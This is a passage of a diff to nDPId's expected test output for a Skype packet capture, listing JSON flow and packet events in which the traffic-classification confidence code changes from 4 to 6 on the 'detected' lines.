-00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"skype.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":547,"source":"skype.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"skype.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":68,"pkt_l4_len":34,"thread_ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAAA27UQAAEARdBjAqAEiQAQXjDLdnEwAIlR2m7wC9vRcAIihDfXYF+Nv6Z8h\/1gxupEorwc="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"skype.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"skype.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":26,"flow_max_l4_payload_len":26,"flow_tot_l4_payload_len":26,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.140","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":548,"source":"skype.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":548,"source":"skype.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1431969657367,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969657367,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4fm8AAEAR4uHAqAEiQAQXljLdnEQAJKG2m74ChlnucS6od9D4320Ts5x3xY96lsRHLX7REg=="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":548,"source":"skype.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":548,"source":"skype.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657367,"flow_last_seen":1431969657367,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969657367,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.150","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":549,"source":"skype.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969657368,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":549,"source":"skype.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1431969657368,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969657368,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0lqwAAEARaEzAqAEib91KGTLdnFwAIDPbm8ACFZDv7jAw6LF020D2sIW\/RLlBE6QH"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":549,"source":"skype.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969657368,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":549,"source":"skype.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969657368,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.25","src_port":13021,"dst_port":40028,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":550,"source":"skype.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969657368,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.153","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":550,"source":"skype.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1431969657368,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969657368,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5GS4AAEAR4kXAqAEib91NmTLdnFgAJQIPm8ICkS16B313b791pcC\/iQ60uf4KWNmYdYf5eCQ="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"skype.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969657368,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.153","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"skype.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969657368,"flow_last_seen":1431969657368,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969657368,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.153","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1431969657498,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969657498,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADcGYi6dN4KMwKgBIpxhw3JnDsNv\/4c1o6ASOJAm+AAAAgQFrAQCCApOvfTqPiLFlwEDAwk="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":554,"source":"skype.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1431969657498,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969657498,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0z75AAEAGiXfAqAEinTeCjMNynGH\/hzWjZw7DcIAQECx9oAAAAQEICj4ixhlOvfTq"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"skype.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1431969657511,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969657511,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADMGsBCdNziqwKgBIpxPw3E+7utRq+gShaASOJAwmQAAAgQFrAQCCApNea1+PiLFlwEDAwk="} @@ -220,19 +220,19 @@ 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1431969658376,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969658376,"pkt":"0NQSxnP1PBXCt3IOCABFAABAQSRAAEAGrlLAqAEi1cezr8NznFXnJeTHAAAAALAC\/\/+4YAAAAgQFtAEDAwUBAQgKPiLJgQAAAAAEAgAA"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":581,"source":"skype.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":581,"source":"skype.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1431969658376,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969658376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0QmIAAEARVi\/AqAEiQTffJjLdnE8AIJ1Im8QCCqRVDPPz90033q\/EDoSNqvvC54ua"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":581,"source":"skype.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":581,"source":"skype.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.38","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":582,"source":"skype.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40008,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":582,"source":"skype.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1431969658376,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969658376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+eZEAAEARtmzAqAEinTfrrzLdnEgAKiUSm8YCMvX5DXLyjY07d4zs9r3Rfjeqbt6RlQe5nLyOBDZmjA=="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":582,"source":"skype.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40008,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":582,"source":"skype.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.175","src_port":13021,"dst_port":40008,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":583,"source":"skype.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":583,"source":"skype.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1431969658376,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431969658376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+H6wAAEAReNbAqAEiQTffKzLdnEIAKjdVm8gCRata2g4WRHPEL7\/NhH8e4p0ZaFQg5mWNPjrWv1AvJA=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":583,"source":"skype.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40002,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":583,"source":"skype.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.43","src_port":13021,"dst_port":40002,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":584,"source":"skype.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"skype.pcap","alias":"nDPId-test","flow_id":61,"flow_packet_id":1,"flow_last_seen":1431969658376,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969658376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4T0EAAEARk9HAqAEinTc4oTLdnEwAJGHem8oC2K8VAwXZ2I4FcvndU1pGdzS9eSLWH0xc+w=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":584,"source":"skype.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":584,"source":"skype.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.161","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":585,"source":"skype.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"skype.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":1,"flow_last_seen":1431969658376,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969658376,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4VhMAAEARqOnAqAEib91KETLdnFYAJFy+m8wCfUg82Gg6DnsozSUd0tlDoiZPS7EFljPm7g=="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":585,"source":"skype.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":585,"source":"skype.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658376,"flow_last_seen":1431969658376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969658376,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1431969658463,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969658463,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIpxVw3Nt\/WNx5yXkyKASOJA3OAAAAgQFrAQCCApO2zlGPiLJgQEDAwk="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":587,"source":"skype.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1431969658464,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969658464,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0kRFAAEAGXnHAqAEi1cezr8NznFXnJeTIbf1jcoAQECyOCgAAAQEICj4iydlO2zlG"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969658978,"flow_last_seen":1431969658978,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969658978,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.44","src_port":50036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} @@ -249,146 +249,146 @@ 